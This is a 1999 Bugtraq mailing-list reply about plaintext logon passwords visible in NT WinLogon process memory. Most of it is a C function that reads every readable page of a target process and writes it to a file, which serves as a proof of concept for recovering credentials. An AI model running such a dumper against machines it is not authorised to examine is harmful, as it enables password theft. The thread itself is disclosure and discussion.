Bugtraq mailing list archives
Re: NT WinLogon VM contains plaintext password visible in admin mode
From: rhorvick () GREATPLAINS COM (Robert Horvick)
Date: Thu, 16 Dec 1999 13:11:21 -0600
Actually there is a large bug in the code (well - it works just as well but
thousands of times faster and is more correct):
There is no reason to look beyond the application min and max address range
and no reason to read in anything other than page sizes (since a
VirtualAlloc will always round to at least the next largest page size).
This was how I should have written it to begin with but I got lazy :)
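
    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>

    /* Write every readable page in hProc's application address range to
       szPath and return the number of bytes dumped. */
    DWORD DumpMemory(HANDLE hProc, LPSTR szPath)
    {
        LPSTR lpOffset = 0;
        LPSTR lpBuf = 0;
        SIZE_T dwRead = 0;          /* ReadProcessMemory reports a SIZE_T */
        BOOL bLastRead = FALSE;     /* TRUE while inside a run of readable pages */
        DWORD dwDumpedBytes = 0;
        SYSTEM_INFO si = {0};
        FILE *f = 0;

        f = fopen(szPath, "wb");
        if(f)
        {
            GetSystemInfo(&si);
            lpBuf = (LPSTR)malloc(si.dwPageSize + 1);
            if(!lpBuf)
            {
                fclose(f);
                return 0;
            }

            /* One page per iteration; the loop increment is the only place
               lpOffset advances, so no page is skipped. */
            for(lpOffset = (LPSTR)si.lpMinimumApplicationAddress;
                (void*)lpOffset <= si.lpMaximumApplicationAddress;
                lpOffset += si.dwPageSize)
            {
                if(ReadProcessMemory(hProc,
                                     lpOffset,
                                     lpBuf,
                                     si.dwPageSize,
                                     &dwRead))
                {
                    if(bLastRead)
                    {
                        fwrite(lpBuf, 1, dwRead, f);
                    }
                    else
                    {
                        /* First page of a new readable run: record its address */
                        fprintf(f, "\noffset %p\n", (void*)lpOffset);
                        fwrite(lpBuf, 1, dwRead, f);
                        bLastRead = TRUE;
                    }
                    dwDumpedBytes += (DWORD)dwRead;
                }
                else
                {
                    bLastRead = FALSE;
                }
            }
            free(lpBuf);
            fclose(f);
        }
        else
        {
            fprintf(stderr, "Unable to open %s\n", szPath);
        }
        return dwDumpedBytes;
    }
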
-----Original Message-----
From: Jorge_Miguel_Pinto () BancoBPI PT
[mailto:Jorge_Miguel_Pinto () BancoBPI PT]
Sent: Thursday, December 16, 1999 9:48 AM
To: rhorvick () GREATPLAINS COM
Cc: BUGTRAQ () SECURITYFOCUS COM
Subject: RE: NT WinLogon VM contains plaintext password visible in admin mode
I am sorry, but I only read this today...
There is a small bug in this code...
<! LPSTR lpOffset = (void*)1;
!> LPSTR lpOffset = (LPSTR)1;
This also doesn't work on Windows 2000 Professional, SRV and Adv Srv.
Greetings,
J.
